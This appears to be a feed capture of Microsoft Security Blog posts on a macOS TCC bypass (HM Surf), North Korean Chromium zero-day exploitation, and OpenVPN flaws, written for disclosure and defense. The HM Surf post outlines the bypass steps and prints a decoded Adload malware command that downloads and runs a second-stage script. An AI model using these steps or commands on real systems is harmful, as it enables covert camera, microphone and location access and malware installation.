Vulnerabilities and exploits | Latest Threats | Microsoft Security Blog http://approjects.co.za/?big=en-us/security/blog/threat-intelligence/vulnerabilities-and-exploits/ Expert coverage of cybersecurity topics Thu, 17 Oct 2024 16:05:14 +0000 en-US hourly 1 https://wordpress.org/?v=6.6.2 New macOS vulnerability, “HM Surf”, could lead to unauthorized data access http://approjects.co.za/?big=en-us/security/blog/2024/10/17/new-macos-vulnerability-hm-surf-could-lead-to-unauthorized-data-access/ Thu, 17 Oct 2024 16:00:00 +0000 Microsoft Threat Intelligence uncovered a macOS vulnerability that could potentially allow an attacker to bypass the operating system’s Transparency, Consent, and Control (TCC) technology and gain unauthorized access to a user’s protected data. The vulnerability, which we refer to as “HM Surf”, involves removing the TCC protection for the Safari browser directory and modifying a […]

The post New macOS vulnerability, “HM Surf”, could lead to unauthorized data access appeared first on Microsoft Security Blog.

]]>
Microsoft Threat Intelligence uncovered a macOS vulnerability that could potentially allow an attacker to bypass the operating system’s Transparency, Consent, and Control (TCC) technology and gain unauthorized access to a user’s protected data. The vulnerability, which we refer to as “HM Surf”, involves removing the TCC protection for the Safari browser directory and modifying a configuration file in the said directory to gain access to the user’s data, including browsed pages, the device’s camera, microphone, and location, without the user’s consent.  

After discovering the bypass technique, we shared our findings with Apple through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR). Apple released a fix for this vulnerability, now identified as CVE-2024-44133, as part of security updates for macOS Sequoia, released on September 16, 2024. At present, only Safari uses the new protections afforded by TCC. Microsoft is currently collaborating with other major browser vendors to investigate the benefits of hardening local configuration files.

We encourage macOS users to apply these security updates as soon as possible. Behavior monitoring protections in Microsoft Defender for Endpoint has detected activity associated with Adload, a prevalent macOS threat family, potentially exploiting this vulnerability. Microsoft Defender for Endpoint detects and blocks CVE-2024-44133 exploitation, including anomalous modification of the Preferences file through HM Surf or other methods.

We initially described TCC technology and how we were able to bypass it in our powerdir vulnerability discovery. As a reminder, TCC is a technology that prevents apps from accessing users’ personal information, including services such as location services, camera, microphone, downloads directory, and others, without their prior consent and knowledge. Formally, the only legitimate way for an app to gain access to those services is by approving a popup through the user interface, or by approving per-app access in the operating system’s settings. In this blog post, we share details on how HM Surf can enable attackers to bypass TCC and access the said services without user consent. We also provide guidance for organizations to protect devices from successful exploitation.

Safari entitlements and TCC

Entitlements, as we shared in a past blog post, are privileges that macOS apps might have, and are digitally signed by Apple. Apple reserves some entitlements to their own applications, which are known as private entitlements. Such entitlements commonly start with the com.apple.private prefix.

When it comes to TCC, the com.apple.private.tcc.allow entitlement allows the entitled app to completely bypass TCC checks for services that are mentioned under the entitlement. Safari, the default browser in macOS, has very powerful TCC entitlements, including com.apple.private.tcc.allow:

A screenshot of the code for TCC entitlements and various information on Safari
Figure 1. TCC entitlements and various information on Safari

There are two important aspects here:

  1. Safari can freely access the address book (kTCCServiceAddressBook), camera (kTCCServiceCamera), microphone (kTCCServiceMicrophone), and more, completely bypassing TCC access checks for those services.
  2. Safari is compiled with flags=0x2000 (library-validation), which means all dynamically loaded libraries must be digitally signed by the same Team ID. This feature could be considered a part of Apple’s Hardened Runtime, and hardens the app against certain type of attacks such as code injection. The Hardened Runtime technology is in many aspects similar to the Windows process mitigation policies, and essentially means an attacker is going to have a very hard time running arbitrary code in the context of Safari.

By default, when one browses a website that requires access to the camera or the microphone, a TCC-like popup still appears, which means Safari maintains its own TCC policy. That makes sense, since Safari must maintain access records on a per-origin (website) basis:

A screenshot of the TCC-like popup by Safari for when requesting to access the camera
Figure 2. TCC-like popup by Safari

We discovered that Safari maintains its configuration in various files under ~/Library/Safari (the user’s home directory). That said directory contains several files of interest, including the following:

FilenameDescriptionRemarks
AutoFillCorrections.dbA SQLite database containing autocorrections information.Useful for information gathering, but not TCC-related.
Downloads.plistA configuration file containing metadata about downloads.Useful for information gathering, but not TCC-related.
History.dbA SQLite database containing the browsing history.Useful for information gathering, but not TCC-related.
PerSitePreferences.dbA SQLite database containing the per-site preferences. Also contains default TCC security preferences.TCC-related, as it contains the default behavior for TCC service access.
UserMediaPermissions.plistA configuration file containing the permissions per site.TCC-related, as it contains the TCC user choices per-origin.

Therefore:

  1. Reading arbitrary files from the directory allows attackers to gather extremely useful information (such as the user’s browsing history).
  2. Writing to the directory allows TCC bypasses, for instance, by overriding the PerSitePreferences.db.

Apple’s approach of protecting that directory with TCC is therefore very justified.

Exploitation

Similar to the exploit we developed for powerdir, we noticed that sensitive files exist under the user’s home directory. We concluded we could use a similar method to remove the protection for the ~/Library/Safari directory.

Our exploit involves the following steps:

  1. Change the home directory of the current user with the dscl utility, which does not require TCC access in Sonoma (At this point, the ~/Library/Safari directory is no longer TCC protected).
  2. Modify the sensitive files under the user’s real home directory (such as /Users/$USER/Library/Safari/PerSitePreferences.db).
  3. Change the home directory again so Safari uses the now modified files.
  4. Run Safari to open a webpage that takes a camera snapshot and trace device location.

In our exploit, we also reset the TCC permissions of the Terminal (using tccutil) for the sake of demonstration.

We noticed that PerSitePreferences.db is used only when a secure connection occurs (over HTTPS), but an attacker could host malicious JavaScript code over HTTPS.

The JavaScript code that takes the camera snapshot and retrieves location information is straightforward and is hosted here (the code does not include the exploit). The most important part that usually requires TCC camera access is:

A screenshot of JavaScript code to access the camera in a macOS device
Figure 3. Accessing the camera through JavaScript
A screenshot of the code within the PerSitePreferences.db file used in the exploit.
Figure 4. The contents of the PerSitePreferences.db file we used in our exploit show full access to camera, microphone, downloads, and geolocation.

We downloaded the snapshot in our demonstration, but in a real scenario, an attacker could do stealthy things, including:

  1. Host the snapshot somewhere to be downloaded later privately.
  2. Save an entire camera stream.
  3. Record microphone and stream it to another server or upload it.
  4. Get access to the device’s location.
  5. Start Safari in a very small window to not draw attention.

We called our exploit HM Surf in reference to the HM03 (Surf) Safari zone and recorded a complete video of our exploit. Note how TCC access for Camera is not permitted, as well as Safari-specific controls do not automatically allow Camera access:

Figure 5. Exploit code in action

Third-party browsers

Third-party browsers such as Google Chrome, Mozilla Firefox, or Microsoft Edge do not have the same private entitlements as Apple applications, which means that the said apps can’t bypass TCC checks.

A screenshot of the popup shown by Google Chrome to ask for TCC access to the microphone.
Figure 6. Google Chrome first asking TCC access to the microphone via a “true” TCC popup that works at the app level.

Therefore, when an end-user runs a third-party browser to use a TCC service (such as the camera, microphone, or location) for the first time, a TCC popup will appear and ask for access to the resource. By design, the access approval happens at the app level rather than at a per-origin (the combination of schema, host name, and port number) level. Once access is approved to an app, it’s then up to that app to maintain their own database of approved origins for privacy and safety.

Detecting new Adload behavior via behavioral monitoring

After discovering this new technique of bypassing TCC, we deployed behavior monitoring detection strategies to protect customers. In analyzing the intelligence gathered from the detection strategies, we observed a suspicious activity in a customer’s device: a process by the name of p running from the /private/tmp world-writable folder (SHA-256: 17e1b83089814128bc243315894f412026503c10b710c9c59d4aaf67bc209cb8) that anomalously modified the local user’s Chrome Preferences file.

Upon further examination, we discovered the parent process was running with the following command line:

/Users/<username>/Library/Application Support/.17066225541972342347/Services/com.BasicIndex.service/BasicIndex.service” -s 6600

The com.BasicIndex.service folder name is a fake macOS service attributed to Adload, a prevalent macOS threat family we have described in the past.

These are the behaviors we discovered:

TTPsDescription
T1082 – System Information DiscoveryRunning the command: sh -c “sw_vers -productVersion” To detect the current macOS version.
T1033 – System Owner/User DiscoveryRunning the command: /usr/bin/id -u <username> To get the user ID of the given username. The username was reducted for privacy reasons.
T1059.002 – Command and Scripting Interpreter: AppleScript T1059.004 – Command and Scripting Interpreter: Unix ShellRunning the command: /usr/bin/osascript -e ‘do shell script “touch ‘/tmp/GmaNi4v50ekNZSI'” user name “<username>” password <password> as string) with administrator privileges’ To get an extra verification the correct user’s password was collected.
T1068 – Exploitation for Privilege EscalationAdding the following URL to the Microphone and Camera approved lists in the local user’s Chrome Preferences file: hxxps://localhost:4444 This is potentially done as a means to bypass TCC.
T1140 – Deobfuscate/Decode Files or Information T1059.004 – Command and Scripting Interpreter: Unix Shell T1071.001 – Application Layer Protocol: Web Protocols T1222.002 – File and Directory Permissions Modification: Linux and Mac File and Directory Permissions ModificationRunning the following base64-obfuscated script: /bin/zsh -c “echo -e WFVNS2JXNnNTM3c9J3RtcD0iJChta3R<reduced for brievty> | base64 -D | /bin/bash” After base64-decoding and script de-obfuscation, it turns into: tmp=”$(mktemp /tmp/XXXXXXXX)”; curl –retry 5 -f “hxxp://api.inetprogress.com/plg?u=B2874734-0534-5274-9025-3EDB3F160B34” -o “${tmp}”; if [[ -s “${tmp}” ]]; then chmod 777 “${tmp}”; “${tmp}”; fi; rm “${tmp}” Which simply downloads a second stage script and runs it.

Since we weren’t able to observe the steps taken leading to the activity, we can’t fully determine if the Adload campaign is exploiting the HM surf vulnerability itself. Attackers using a similar method to deploy a prevalent threat raises the importance of having protection against attacks using this technique.

Microsoft Defender for Endpoint uses advanced behavioral analytics and machine learning to detect anomalous activities on a device and can detect this kind of malicious behavior, including anomalous modification of the Preferences file through HM Surf or other methods.

A screenshot of the Microsoft Defender for Endpoint alert preventing the anomalous modification to browser files.
Figure 7. Prevention of anomalous modifications to browser files. Note this is a generic detection and does not only fit Adload campaigns.

Hardening device security through vulnerability management and behavioral monitoring

Continuous research on vulnerabilities in security technologies like TCC in macOS devices is important to help ensure that user data is protected from unauthorized access. Software vendors are always in a tight race against malicious actors to discover vulnerabilities and address them before they are exploited for attacks. The discoveries and insights from our research, including vulnerabilities such as Migraine, powerdir, and Shrootless, enrich our protection technologies and solutions such as Microsoft Defender for Endpoint, which allows organizations to quickly discover and remediate vulnerabilities in their networks that are increasingly becoming heterogeneous.

In addition, Microsoft Defender for Endpoint uses advanced behavioral analytics and machine learning to detect anomalous activities on a device, such as creating spoofed home directories, a technique which was previously used in other vulnerabilities. In the example provided in the previous section, Microsoft Defender for Endpoint detects modifications to the Safari private directory, as well as private directories of third-party browsers, as suspicious. Extending the concept, Defender for Endpoint has similar detections for sensitive file access (including Safari-specific settings) by a non-Safari application.

Apple has also introduced new APIs for App Group Containers that make SIP (System Integrity Policy) that protect configuration files from being modified by an external attacker, resolving the vulnerability class. At present, only Safari uses the new protections afforded by TCC. Microsoft is currently collaborating with other major browser vendors to investigate the benefits of hardening local configuration files. While Chromium and Firefox is yet to adopt the new APIs, Chromium is moving towards using os_crypt which solves the attack in a different way.

Microsoft continues to monitor the threat landscape to discover new vulnerabilities and attacker techniques that could affect macOS and other non-Windows devices. As cross-platform threats continue to increase, a coordinated response to vulnerability discoveries and other forms of threat intelligence sharing will help enrich protection technologies that secure users’ computing experience regardless of the platform or device they’re using.

References

Jonathan Bar Or
Microsoft Threat Intelligence

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post New macOS vulnerability, “HM Surf”, could lead to unauthorized data access appeared first on Microsoft Security Blog.

]]>
North Korean threat actor Citrine Sleet exploiting Chromium zero-day http://approjects.co.za/?big=en-us/security/blog/2024/08/30/north-korean-threat-actor-citrine-sleet-exploiting-chromium-zero-day/ Fri, 30 Aug 2024 16:00:00 +0000 Microsoft identified a North Korean threat actor exploiting a zero-day vulnerability in Chromium (CVE-2024-7971) to gain remote code execution (RCE) in the Chromium renderer process. Our assessment of ongoing analysis and observed infrastructure attributes this activity to Citrine Sleet, a North Korean threat actor that commonly targets the cryptocurrency sector for financial gain.

The post North Korean threat actor Citrine Sleet exploiting Chromium zero-day appeared first on Microsoft Security Blog.

]]>
On August 19, 2024, Microsoft identified a North Korean threat actor exploiting a zero-day vulnerability in Chromium, now identified as CVE-2024-7971, to gain remote code execution (RCE). We assess with high confidence that the observed exploitation of CVE-2024-7971 can be attributed to a North Korean threat actor targeting the cryptocurrency sector for financial gain. Our ongoing analysis and observed infrastructure lead us to attribute this activity with medium confidence to Citrine Sleet. We note that while the FudModule rootkit deployed has also been attributed to Diamond Sleet, another North Korean threat actor, Microsoft previously identified shared infrastructure and tools between Diamond Sleet and Citrine Sleet, and our analysis indicates this might be shared use of the FudModule malware between these threat actors.

CVE-2024-7971 is a type confusion vulnerability in the V8 JavaScript and WebAssembly engine, impacting versions of Chromium prior to 128.0.6613.84. Exploiting the vulnerability could allow threat actors to gain RCE in the sandboxed Chromium renderer process. Google released a fix for the vulnerability on August 21, 2024, and users should ensure they are using the latest version of Chromium. We would like to thank the Chromium team for their collaboration in addressing this issue. CVE-2024-7971 is the third exploited V8 type confusion vulnerability that has been patched in V8 this year, after CVE-2024-4947 and CVE-2024-5274. As with any observed nation-state actor activity, Microsoft has directly notified targeted or compromised customers, providing them with important information to help secure their environments.

In this blog, we share details on the North Korean threat actor Citrine Sleet and the observed tactics, techniques, and procedures (TTPs) used to exploit CVE-2024-7971, deploy the FudModule rootkit, and compromise systems. We further provide recommended mitigations, detection details, hunting guidance, and indicators of compromise (IOCs) to help defenders identify, respond to, and improve defenses against these attacks.

Who is Citrine Sleet?

The threat actor that Microsoft tracks as Citrine Sleet is based in North Korea and primarily targets financial institutions, particularly organizations and individuals managing cryptocurrency, for financial gain. As part of its social engineering tactics, Citrine Sleet has conducted extensive reconnaissance of the cryptocurrency industry and individuals associated with it. The threat actor creates fake websites masquerading as legitimate cryptocurrency trading platforms and uses them to distribute fake job applications or lure targets into downloading a weaponized cryptocurrency wallet or trading application based on legitimate applications. Citrine Sleet most commonly infects targets with the unique trojan malware it developed, AppleJeus, which collects information necessary to seize control of the targets’ cryptocurrency assets. The FudModule rootkit described in this blog has now been tied to Citrine Sleet as shared tooling with Diamond Sleet.

The United States government has assessed that North Korean actors, like Citrine Sleet, will likely continue targeting vulnerabilities of cryptocurrency technology firms, gaming companies, and exchanges to generate and launder funds to support the North Korean regime. One of the organizations targeted by the CVE-2024-7971 exploitation was also previously targeted by Sapphire Sleet.

Citrine Sleet is tracked by other security companies as AppleJeus, Labyrinth Chollima, UNC4736, and Hidden Cobra, and has been attributed to Bureau 121 of North Korea’s Reconnaissance General Bureau.

Exploiting CVE-2024-7971

The observed zero-day exploit attack by Citrine Sleet used the typical stages seen in browser exploit chains. First, the targets were directed to the Citrine Sleet-controlled exploit domain voyagorclub[.]space. While we cannot confirm at this time how the targets were directed, social engineering is a common tactic used by Citrine Sleet. Once a target connected to the domain, the zero-day RCE exploit for CVE-2024-7971 was served.

After the RCE exploit achieved code execution in the sandboxed Chromium renderer process, shellcode containing a Windows sandbox escape exploit and the FudModule rootkit was downloaded, and then loaded into memory. The sandbox escape exploited CVE-2024-38106, a vulnerability in the Windows kernel that Microsoft fixed on August 13, 2024, before Microsoft discovered this North Korean threat actor activity. CVE-2024-38106 was reported to Microsoft Security Response Center (MSRC) as being exploited; however, our investigations so far have not suggested any link between the reported CVE-2024-38106 exploit activity and this Citrine Sleet exploit activity, beyond exploiting the same vulnerability. This may suggest a “bug collision,” where the same vulnerability is independently discovered by separate threat actors, or knowledge of the vulnerability was shared by one vulnerability researcher to multiple actors.

Once the sandbox escape exploit was successful, the main FudModule rootkit ran in memory. This rootkit employs direct kernel object manipulation (DKOM) techniques to disrupt kernel security mechanisms, executes exclusively from user mode, and performs kernel tampering through a kernel read/write primitive. We did not observe any additional malware activity on the target devices.

Attack chain diagram of Citrine Sleet exploiting the Chromium zero-day
CVE-2024-7971 zero-day exploitation attack chain leading to FudModule rootkit

FudModule rootkit

FudModule is a sophisticated rootkit malware that specifically targets kernel access while evading detection. Threat actors have been observed using the FudModule data-only rootkit to establish admin-to-kernel access to Windows-based systems to allow read/write primitive functions and perform DKOM.

Diamond Sleet has been observed using FudModule since October 2021. The earliest variant of FudModule was reported publicly in September 2022 by ESET and AhnLAB researchers, when threat actors exploited known vulnerable drivers to establish admin-to-kernel access in the technique known as bring your own vulnerable driver (BYOVD). In February 2024, Avast researchers published analysis on an updated FudModule variant that is significantly more advanced and difficult to detect, since it exploits a zero-day vulnerability in appid.sys, an AppLocker driver that is installed by default into Windows (CVE-2024-21338).

Further research by Avast uncovered a full attack chain deploying the updated variant of FudModule known as “FudModule 2.0,” which includes malicious loaders and a late-stage remote access trojan (RAT). This attack chain revealed the previously unknown malware Kaolin RAT was responsible for loading the FudModule rootkit to targeted devices. Kaolin RAT established a secure, AES-encrypted connection with the command and control (C2) server and had capabilities to execute a robust list of commands, such as downloading and uploading files to the C2 server and creating or updating processes. The updated variant of FudModule exhibited an attack chain similar to that seen in Citrine Sleet’s zero-day exploit of CVE-2024-7971.

On August 13, Microsoft released a security update to address a zero-day vulnerability in the AFD.sys driver in Windows (CVE-2024-38193) identified by Gen Threat Labs. In early June, Gen Threat Labs identified Diamond Sleet exploiting this vulnerability in an attack employing the FudModule rootkit, which establishes full standard user-to-kernel access, advancing from the previously seen admin-to-kernel access. Gen Threat Labs released this information publicly on August 16.

Recommendations

The CVE-2024-7971 exploit chain relies on multiple components to compromise a target, and this attack chain fails if any of these components are blocked, including CVE-2024-38106. Microsoft released a security update on August 13, 2024, for the CVE-2024-38106 vulnerability exploited by Diamond Sleet, thus also blocking attempts to exploit the CVE-2024-7971 exploit chain on updated systems. Customers who have not implemented these fixes yet are urged to do so as soon as possible for their organization’s security.

Zero-day exploits necessitate not only keeping systems up to date, but also security solutions that provide unified visibility across the cyberattack chain to detect and block post-compromise attacker tools and malicious activity following exploitation. Microsoft recommends the following mitigations to reduce the impact of this threat.

Strengthen operating environment configuration

  • Keep operating systems and applications up to date. Apply security patches as soon as possible. Ensure that Google Chrome web browser is updated at version 128.0.6613.84 or later, and Microsoft Edge web browser is updated at version 128.0.2739.42 or later to address the CVE-2024-7971 vulnerability.
  • Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.

Strengthen Microsoft Defender for Endpoint configuration

  • Ensure that tamper protection is turned on in Microsoft Dender for Endpoint.
  • Enable network protection in Microsoft Defender for Endpoint.
  • Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can help block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to help remediate malicious artifacts that are detected post-breach.
  • Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to help resolve breaches, significantly reducing alert volume.

Strengthen Microsoft Defender Antivirus configuration

  • Turn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to help cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block majority of new and unknown variants.
  • Turn on Microsoft Defender Antivirus scanning of downloaded files and attachments.
  • Turn on real-time protection in Microsoft Defender Antivirus.

Detection details

Microsoft Defender for Endpoint

The following Microsoft Defender for Endpoint alert might also indicate threat activity related to this threat. Note, however, that this alert can also be triggered by unrelated threat activity.

  • Emerging threat activity group Citrine Sleet detected

Microsoft Defender Vulnerability Management

Microsoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:

  • CVE-2024-7971
  • CVE-2024-38106

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide intelligence and protection information, and recommend actions to help prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender Threat Intelligence

Hunting queries

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following query to find related activity in their networks:

Citrine Sleet domain activity

Microsoft Defender XDR customers may query for devices that may have interacted with Citrine Sleet domains related to this activity. Note that Microsoft Defender for Endpoint customers may surface related events with the alert title “Emerging threat activity group Citrine Sleet detected”.

let domainList = dynamic(["weinsteinfrog.com", "voyagorclub.space"]);
union
(
    DnsEvents
    | where QueryType has_any(domainList) or Name has_any(domainList)
    | project TimeGenerated, Domain = QueryType, SourceTable = "DnsEvents"
),
(
    IdentityQueryEvents
    | where QueryTarget has_any(domainList)
    | project Timestamp, Domain = QueryTarget, SourceTable = "IdentityQueryEvents"
),
(
    DeviceNetworkEvents
    | where RemoteUrl has_any(domainList)
    | project Timestamp, Domain = RemoteUrl, SourceTable = "DeviceNetworkEvents"
),
(
    DeviceNetworkInfo
    | extend DnsAddresses = parse_json(DnsAddresses), ConnectedNetworks = parse_json(ConnectedNetworks)
    | mv-expand DnsAddresses, ConnectedNetworks
    | where DnsAddresses has_any(domainList) or ConnectedNetworks.Name has_any(domainList)
    | project Timestamp, Domain = coalesce(DnsAddresses, ConnectedNetworks.Name), SourceTable = "DeviceNetworkInfo"
),
(
    VMConnection
    | extend RemoteDnsQuestions = parse_json(RemoteDnsQuestions), RemoteDnsCanonicalNames = parse_json(RemoteDnsCanonicalNames)
    | mv-expand RemoteDnsQuestions, RemoteDnsCanonicalNames
    | where RemoteDnsQuestions has_any(domainList) or RemoteDnsCanonicalNames has_any(domainList)
    | project TimeGenerated, Domain = coalesce(RemoteDnsQuestions, RemoteDnsCanonicalNames), SourceTable = "VMConnection"
),
(
    W3CIISLog
    | where csHost has_any(domainList) or csReferer has_any(domainList)
    | project TimeGenerated, Domain = coalesce(csHost, csReferer), SourceTable = "W3CIISLog"
),
(
    EmailUrlInfo
    | where UrlDomain has_any(domainList)
    | project Timestamp, Domain = UrlDomain, SourceTable = "EmailUrlInfo"
),
(
    UrlClickEvents
    | where Url has_any(domainList)
    | project Timestamp, Domain = Url, SourceTable = "UrlClickEvents"
)
| order by TimeGenerated desc

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Search for domain IOCs

let domainList = dynamic(["weinsteinfrog.com", "voyagorclub.space"]); 
union 
( 
DnsEvents 
| where QueryType has_any(domainList) or Name has_any(domainList) 
| project TimeGenerated, Domain = QueryType, SourceTable = "DnsEvents" 
), 
( 
IdentityQueryEvents 
| where QueryTarget has_any(domainList) 
| project TimeGenerated, Domain = QueryTarget, SourceTable = "IdentityQueryEvents" 
), 
( 
DeviceNetworkEvents 
| where RemoteUrl has_any(domainList) 
| project TimeGenerated, Domain = RemoteUrl, SourceTable = "DeviceNetworkEvents" 
), 
( 
DeviceNetworkInfo 
| extend DnsAddresses = parse_json(DnsAddresses), ConnectedNetworks = parse_json(ConnectedNetworks) 
| mv-expand DnsAddresses, ConnectedNetworks 
| where DnsAddresses has_any(domainList) or ConnectedNetworks.Name has_any(domainList) 
| project TimeGenerated, Domain = coalesce(DnsAddresses, ConnectedNetworks.Name), SourceTable = "DeviceNetworkInfo" 
), 
( 
VMConnection 
| extend RemoteDnsQuestions = parse_json(RemoteDnsQuestions), RemoteDnsCanonicalNames = parse_json(RemoteDnsCanonicalNames) 
| mv-expand RemoteDnsQuestions, RemoteDnsCanonicalNames 
| where RemoteDnsQuestions has_any(domainList) or RemoteDnsCanonicalNames has_any(domainList) 
| project TimeGenerated, Domain = coalesce(RemoteDnsQuestions, RemoteDnsCanonicalNames), SourceTable = "VMConnection" 
), 
( 
W3CIISLog 
| where csHost has_any(domainList) or csReferer has_any(domainList) 
| project TimeGenerated, Domain = coalesce(csHost, csReferer), SourceTable = "W3CIISLog" 
), 
( 
EmailUrlInfo 
| where UrlDomain has_any(domainList) 
| project TimeGenerated, Domain = UrlDomain, SourceTable = "EmailUrlInfo" 
), 
( 
UrlClickEvents 
| where Url has_any(domainList) 
| project TimeGenerated, Domain = Url, SourceTable = "UrlClickEvents" 
),
(
CommonSecurityLog
| where DestinationDnsDomain has_any(domainList)
| project TimeGenerated, Domain = DestinationDnsDomain, SourceTable = "CommonSecurityLog" 
),
(
EmailEvents
| where SenderFromDomain has_any (domainList) or SenderMailFromDomain has_any (domainList)
| project TimeGenerated, SenderfromDomain = SenderFromDomain,SenderMailfromDomain = SenderMailFromDomain, SourceTable = "EmailEvents"
)
| order by TimeGenerated desc

Assess presence of vulnerabilities used by Citrine Sleet

DeviceTvmSoftwareVulnerabilities  
| where CveId has_any ("CVE-2024-7971","CVE-2024-38106","CVE-2024-38193","CVE-2024-21338")
| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion,  
CveId,VulnerabilitySeverityLevel  
| join kind=inner ( DeviceTvmSoftwareVulnerabilitiesKB | project CveId, CvssScore,IsExploitAvailable,VulnerabilitySeverityLevel,PublishedDate,VulnerabilityDescription,AffectedSoftware ) on CveId  
| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion,  
CveId,VulnerabilitySeverityLevel,CvssScore,IsExploitAvailable,PublishedDate,VulnerabilityDescription,AffectedSoftware

Indicators of compromise

During the attacks, Microsoft observed the following IOCs:

  • voyagorclub[.]space
  • weinsteinfrog[.]com

References

Learn more

Read our blogs on threat actors, including Sleet actors. For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post North Korean threat actor Citrine Sleet exploiting Chromium zero-day appeared first on Microsoft Security Blog.

]]>
Chained for attack: OpenVPN vulnerabilities discovered leading to RCE and LPE http://approjects.co.za/?big=en-us/security/blog/2024/08/08/chained-for-attack-openvpn-vulnerabilities-discovered-leading-to-rce-and-lpe/ Thu, 08 Aug 2024 18:00:00 +0000 Microsoft researchers found multiple vulnerabilities in OpenVPN that could lead to an attack chain allowing remote code execution and local privilege escalation. This attack chain could enable attackers to gain full control over targeted endpoints, potentially resulting in data breaches, system compromise, and unauthorized access to sensitive information.

The post Chained for attack: OpenVPN vulnerabilities discovered leading to RCE and LPE appeared first on Microsoft Security Blog.

]]>
Microsoft researchers recently identified multiple medium severity vulnerabilities in OpenVPN, an open-source project with binaries integrated into routers, firmware, PCs, mobile devices, and many other smart devices worldwide, numbering in the millions. Attackers could chain and remotely exploit some of the discovered vulnerabilities to achieve an attack chain consisting of remote code execution (RCE) and local privilege escalation (LPE). This attack chain could enable attackers to gain full control over targeted endpoints, potentially resulting in data breaches, system compromise, and unauthorized access to sensitive information. Exploiting these vulnerabilities, however, necessitates user authentication and a deep understanding of OpenVPN’s inner workings, alongside intermediate knowledge of the operating systems. Today, we presented this research and demonstrated the discovered attack chain in our session at Black Hat USA 2024.

OpenVPN is widely used by thousands of companies spanning various industries across major platforms such as Windows, iOS, macOS, Android, and BSD. As such, exploitation of the discovered vulnerabilities, which affect all versions of OpenVPN prior to version 2.6.10 (and 2.5.10), could put endpoints and enterprises at significant risk of attack.

We reported the discovery to OpenVPN through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR) in March 2024 and worked closely with OpenVPN to ensure that the vulnerabilities are patched. Information on the security fixes released by OpenVPN to address these vulnerabilities can be found here: OpenVPN 2.6.10. We strongly urge OpenVPN users to apply the latest security updates as soon as possible. We also thank OpenVPN for their collaboration and recognizing the urgency in addressing these vulnerabilities.

Below is a list of the discovered vulnerabilities discussed in this blog:

CVE IDOpenVPN componentImpactAffected platform
CVE-2024-27459openvpnserv                             Denial of service (DoS), local privilege escalation (LPE)Windows
CVE-2024-24974openvpnserv                             Unauthorized access Windows
CVE-2024-27903openvpnservRemote code execution (RCE)Windows
Local privilege escalation (LPE), data manipulationAndroid, iOS, macOS, BSD
CVE-2024-1305Windows TAP driver Denial of service (DoS) Windows

In this blog post, we detail our analysis of the discovered vulnerabilities and the impact of exploitation. In addition to patching, we provide guidance to mitigate and detect threats attempting to exploit these vulnerabilities. This research emphasizes the need for responsible disclosure and collaboration among the security community to defend devices across platforms and build better protection for all, spanning the entire user-device ecosystem. The discovery of these vulnerabilities further highlights the critical importance of ensuring the security of enterprise and endpoint systems and underscores the need for continuous monitoring and protection of these environments.

What is OpenVPN?

OpenVPN is a virtual private network (VPN) system that creates a private and secure point-to-point or site-to-site connection between networks. The OpenVPN open-source project is widely popular across the world, including the United States, India, France, Brazil, the United Kingdom, and Germany, as well as industries spanning the information technology, financial services, telecommunications, and computer software sectors. This project supports different major platforms and is integrated into millions of devices globally.

OpenVPN is also the name of the tunneling protocol it uses, which employs the Secure Socket Layer (SSL) encryption protocol to ensure that data shared over the internet remains private, using AES-256 encryption. Since the source code is available for audit, vulnerabilities can be easily identified and fixed.

OpenVPN analysis

We discovered the vulnerabilities while examining the OpenVPN open-source project to enhance enterprise security standards. During this research, we checked two other popular VPN solutions and found that at the time they were impacted by a vulnerability (CVE-2024-1305). Following this discovery, we started hunting for and uncovered additional vulnerable drivers with the same issue and decided to investigate open-source VPN projects. Upon confirming that the same vulnerability was located in the OpenVPN open-source repository, our research then focused on examining the architecture and security model of the OpenVPN project for Windows systems.

OpenVPN architecture

OpenVPN server client architecture

OpenVPN is a sophisticated VPN system meticulously engineered to establish secure point-to-point or site-to-site connections. It supports both routed and bridged configurations, as well as remote access capabilities, making it a versatile choice for various networking needs. OpenVPN comprises both client and server applications, ensuring a comprehensive solution for secure communication.

